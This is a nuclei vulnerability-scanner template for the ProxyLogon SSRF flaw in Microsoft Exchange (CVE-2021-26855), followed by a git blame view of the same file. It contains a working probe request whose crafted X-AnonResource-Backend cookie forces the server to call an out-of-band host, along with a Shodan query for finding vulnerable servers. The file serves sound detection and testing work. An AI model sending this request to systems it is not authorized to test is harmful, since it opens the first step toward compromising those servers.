nuclei-templates/http/cves/2021/CVE-2021-26855.yaml

id: CVE-2021-26855

info:
  name: Microsoft Exchange Server SSRF Vulnerability
  author: madrobot
  severity: critical
  description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or further compromise of the affected system.
  remediation: Apply the appropriate security update.
  reference:
    - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855
    - https://proxylogon.com/#timeline
    - https://web.archive.org/web/20210306113850/https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
    - https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09
    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2021-26855
    cwe-id: CWE-918
    epss-score: 0.97507
    epss-percentile: 0.9998
    cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: microsoft
    product: exchange_server
    shodan-query: vuln:CVE-2021-26855
  tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev

http:
  - raw:
      - |
        GET /owa/auth/x.js HTTP/1.1
        Host: {{Hostname}}
        Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 490a0046304402200fe691411eb53b66b4b48310012159cc2bfc49aa63c0600a307d387ce1aec440022061edab41f21f98729505a5cc7d7b10ac98eca71c97400b948a630967c9e0a0b0:922c64590222798bb761d5b6d8e72950
Create CVE-2021-26855.yaml 2021-03-06 07:00:59 +00:00			`id: CVE-2021-26855`

			`info:`
Enhancement: cves/2021/CVE-2021-26855.yaml by mp 2022-02-04 16:13:25 +00:00			`name: Microsoft Exchange Server SSRF Vulnerability`
Create CVE-2021-26855.yaml 2021-03-06 07:00:59 +00:00			`author: madrobot`
			`severity: critical`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			description: This vulnerability is part of an attack chain that could allow remote code execution on Microsoft Exchange Server. The initial attack requires the ability to make an untrusted connection to Exchange server port 443. Other portions of the chain can be triggered if an attacker already has access or can convince an administrator to open a malicious file. Be aware his CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, and CVE-2021-27078.
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could lead to unauthorized access to sensitive information, remote code execution, or further compromise of the affected system.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: Apply the appropriate security update.`
Removed pipe (\|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-18 11:37:49 +00:00			`reference:`
Enhancement: cves/2021/CVE-2021-26855.yaml by mp 2022-02-04 16:13:25 +00:00			`- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-26855`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://proxylogon.com/#timeline`
Dead Site Removal (#4641) * Deleted buffalo-config-injection.yaml Add reference from buffalo-config-injection.yaml to CVE-2021-20091.yaml * Delete vulnerabilities/other/buffalo-config-injection.yaml * Link cleanups * Change links to Secunia to point to archive.org * Additonal link cleanup * replace securitytracker.com links with archive.org links 2022-07-01 10:02:07 +00:00			`- https://web.archive.org/web/20210306113850/https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse`
Satisfying the linter (all errors and warnings) * whitespace modifications only 2021-08-19 14:44:46 +00:00			`- https://gist.github.com/testanull/324546bffab2fe4916d0f9d1f03ffa09`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
TemplateMan Update [Sun Jan 14 13:49:26 UTC 2024] :robot: 2024-01-14 13:49:27 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N`
			`cvss-score: 9.1`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2021-26855`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`cwe-id: CWE-918`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`epss-score: 0.97507`
			`epss-percentile: 0.9998`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_21::::::`
Auto Generated CVE annotations [Sun Jul 3 15:33:28 UTC 2022] :robot: 2022-07-03 15:33:28 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: microsoft`
			`product: exchange_server`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`shodan-query: vuln:CVE-2021-26855`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve2021,cve,ssrf,rce,exchange,oast,microsoft,kev`
misc changes 2021-03-06 07:34:26 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2021-26855.yaml 2021-03-06 07:00:59 +00:00			`- raw:`
			`- \|`
			`GET /owa/auth/x.js HTTP/1.1`
			`Host: {{Hostname}}`
minor updates 2021-08-12 15:54:09 +00:00			`Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3;`
Create CVE-2021-26855.yaml 2021-03-06 07:00:59 +00:00
			`matchers:`
			`- type: word`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`part: interactsh_protocol # Confirms the HTTP Interaction`
Create CVE-2021-26855.yaml 2021-03-06 07:00:59 +00:00			`words:`
Enhancement: cves/2021/CVE-2021-26855.yaml by mp 2022-02-04 16:13:25 +00:00			`- "http"`
Auto Template Signing [Mon Mar 25 11:57:16 UTC 2024] :robot: 2024-03-25 11:57:16 +00:00			`# digest: 490a0046304402200fe691411eb53b66b4b48310012159cc2bfc49aa63c0600a307d387ce1aec440022061edab41f21f98729505a5cc7d7b10ac98eca71c97400b948a630967c9e0a0b0:922c64590222798bb761d5b6d8e72950`